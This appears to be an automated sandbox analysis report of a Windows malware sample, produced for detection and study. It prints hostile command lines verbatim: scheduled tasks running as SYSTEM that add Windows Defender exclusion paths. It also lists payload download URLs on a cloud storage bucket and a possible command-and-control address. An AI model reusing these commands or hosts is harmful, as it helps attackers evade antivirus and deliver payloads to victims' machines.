Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifhttps://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifo
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gifq
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.giftsg
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/a.gify
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gif
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifW
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/b.gifo
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/c.gif
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/c.gifA
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/c.gifJ
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622464887.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/d.gif
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/d.giff
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659933195.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/d.gifo
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2597134323.00000000005FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/i.dat:
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659978186.0000000004907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msd1sq.oss-cn-beijing.aliyuncs.com/w
Source: unknown, HTTPS traffic detected: 39.103.20.34:443 -> 192.168.2.6:62735 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:62780 version: TLS 1.2

System Summary

Source: 5.2.EMp3o1.exe.2800000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: tbcore3U.dll.6.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.6.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.6.drStatic PE information: section name: .mo:
Source: tbcore3U.dll.40.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.40.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.40.drStatic PE information: section name: .mo:
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140006C95 NtAllocateVirtualMemory,5_2_0000000140006C95
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\G5CQjd\G5CQjd.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSa.dllp( vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000000.2138846447.0000000141D75000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameInstallVPinMAME.exeR vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevseamps.exe, vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe, 00000000.00000003.2659978186.0000000004907000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSa.dllp( vs 2b687482300.6345827638.08.exe
Source: 2b687482300.6345827638.08.exe Binary or memory string: OriginalFilenameInstallVPinMAME.exeR vs 2b687482300.6345827638.08.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: 5.2.EMp3o1.exe.2800000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.dr Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr Binary string: \Device\TrueSight
Source: classification engine Classification label: mal100.evad.winEXE@65/29@12/3
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
Source: C:\Users\user\Documents\EMp3o1.exe Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,5_2_0000000140001430
Source: C:\Users\user\Documents\EMp3o1.exe Code function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Documents\EMp3o1.exe File created: C:\Program Files (x86)\G5CQjd
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].dat
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Mutant created: \Sessions\1\BaseNamedObjects\aefd_320946
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5252:120:WilError_03
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Mutant created: \Sessions\1\BaseNamedObjects\8.217.47.169:8917:Sauron
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2320:120:WilError_03
Source: C:\Users\user\Documents\EMp3o1.exe Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:764:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1396:120:WilError_03
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Command line argument: tbcore3.dll 41_2_00711000
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Command line argument: tbcore3U.dll 41_2_00711000
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Command line argument: .q 41_2_00712E30
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe Command line argument: tbcore3.dll 42_2_001F1000
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe Command line argument: tbcore3U.dll 42_2_001F1000
Source: 2b687482300.6345827638.08.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Documents\EMp3o1.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 2b687482300.6345827638.08.exe Virustotal: Detection: 12%
Source: 2b687482300.6345827638.08.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exe File read: C:\Users\user\Desktop\2b687482300.6345827638.08.exe
Source: unknown Process created: C:\Users\user\Desktop\2b687482300.6345827638.08.exe "C:\Users\user\Desktop\2b687482300.6345827638.08.exe"
Source: unknown Process created: C:\Users\user\Documents\EMp3o1.exe C:\Users\user\Documents\EMp3o1.exe
Source: unknown Process created: C:\Users\user\Documents\EMp3o1.exe C:\Users\user\Documents\EMp3o1.exe
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\EMp3o1.exe Process created: C:\Program Files (x86)\G5CQjd\G5CQjd.exe "C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
Source: unknown Process created: C:\Program Files (x86)\G5CQjd\G5CQjd.exe "C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
Source: unknown Process created: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
Source: unknown Process created: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe"
Source: unknown Process created: C:\Program Files (x86)\G5CQjd\G5CQjd.exe "C:\Program Files (x86)\G5CQjd\G5CQjd.exe"
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: twext.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: cscui.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: workfoldersshell.dllJump to behavior
